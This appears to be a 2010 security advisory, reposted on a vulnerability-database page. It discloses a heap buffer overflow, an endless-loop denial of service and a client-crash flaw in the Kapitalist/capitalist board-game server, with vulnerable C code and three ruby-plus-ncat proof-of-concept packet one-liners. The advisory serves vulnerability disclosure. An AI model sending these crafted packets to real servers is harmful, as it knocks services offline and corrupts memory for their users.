Lucene search
K

Kapitalist 0.4 / Capitalist 0.3.1 Denial Of Service

🗓️ 14 May 2010 00:00:00Reported by Sebastien DuquetteType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Kapitalist 0.3.1 Denial-of-Service vulnerabilitie

Code
`GVI-2010-01 : Multiple vulnerabilities in Kapitalist/capitalist  
  
Overview  
-----------  
Quote from http://kapitalist.sourceforge.net/  
"Kapitalist is a Monopoly®-like board game for 2-8 players. Walk around the  
board, buy properties, receive rent from your competitors, try to get  
monopolies to build houses and hotels on them and finally be the richest  
on the  
board. "  
  
Description  
-------------  
Two issues were found in capitalist when sending specially crafted  
packets. One  
results in heap corruption, the second makes the server enter in an  
endless loop  
resulting in a Denial-of-Service.  
  
Additionally, sending a specially crafted packet causes the connected  
clients  
to disconnect.  
  
Details  
--------  
Vulnerable Product : capitalist 0.3.1, Kapitalist 0.4  
Vulnerability Type : Buffer overflow, Denial-of-Service  
Discovered by : Sébastien Duquette (virtualguardian.ca)  
  
Original Advisory :  
http://www.gardienvirtuel.ca/wp-content/uploads/2010/05/GVI-2010-01-EN.txt  
  
Timeline  
----------  
The vendor was contacted but no response was received in a two weeks delay.  
  
Bug Discovered : October 12th, 2009  
Vendor Advised : October 14th, 2009  
Additional info sent : October 17th, 2009  
Vendor Response : October 26th, 2009  
Vendor recontacted : February 7th, 2010  
Vendor Response : February 14th, 2010  
Public Disclosure : May 13th, 2010  
  
Analysis  
--------  
When receiving a join game request, capitalist allocates a  
packet_req_join_game  
structure on the heap and copies the received data to it. On the last shown  
line, it copies a string. It does not check however if the string fits  
in the  
allocated buffer.  
  
common/packets.cpp, line 432  
struct packet_req_join_game *  
receive_packet_req_join_game(struct connection *pc)  
{  
unsigned char *cptr;  
struct packet_req_join_game *packet=  
(struct packet_req_join_game *)  
cap_malloc(sizeof(struct packet_req_join_game));  
  
cptr=get_int16(pc->buffer.data, NULL);  
cptr=get_int8(cptr, NULL);  
cptr=get_string(cptr, packet->name);  
  
When called, the get_string() method will copy the string and cause a buffer  
overflow if the string is longer than the allocated size (10 bytes).  
  
common/packets.cpp, line 271  
unsigned char *get_string(unsigned char *buffer, char *mystring)  
{  
unsigned char *c;  
int len;  
  
/* avoid using strlen (or strcpy) on an (unsigned char*) --dwp */  
for(c=buffer; *c; c++) ;  
len = c-buffer+1;  
if(mystring) {  
memcpy(mystring, buffer, len);  
}  
return buffer+len;  
}  
  
Proof of concept  
----------------  
  
Bug #1: Heap corruption  
~~~~~~~~~~~~~~~~~~~~~~~  
  
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'A'*35 << 0x00 " | ncat  
SERVER 2525  
  
If MALLOC_CHECK_ is enabled, a similar message will be printed :  
*** glibc detected *** /home/ekse/src/capitalist2/bin/capitalist: malloc():  
memory corruption: 0x081a7650 ***  
  
Inspecting the memory shows that our packet is the source of the crash:  
(gdb) x 0x081a7650  
0x81a7650: 0x00414141  
  
  
Bug #2: Endless loop  
~~~~~~~~~~~~~~~~~~~~  
  
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAAAAAAA' << 0x00.chr * 8  
<< 0x02  
<< 0x00.chr * 3 << 0x00" | ncat SERVER 2525  
  
  
Bug #3: Crashing the clients  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
ruby -e "print 0x00.chr << 0x14 << 0x00 << 'AAAAA' << 0x00.chr * 8 <<  
0x02 <<  
0x00.chr * 3 << 0x00" | ncat SERVER 2525  
  
After sending this packet, close ncat. The clients will then crash with the  
following message :  
kapitalist: kapgame.cpp:239: Player* const KapGame::player(int) const:  
Assertion `!nobody(id)' failed.  
  
Fun Fact  
---------   
The flaw in the server was found this way :  
while true; do cat /dev/urandom | nc 127.0.0.1 2525  
  
Solution  
---------  
There are currently no fix for these issues. It is recommend not to make  
servers  
available on the Internet and accept connections only from trusted sources.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2010 00:00Current
7.4High risk
Vulners AI Score7.4
21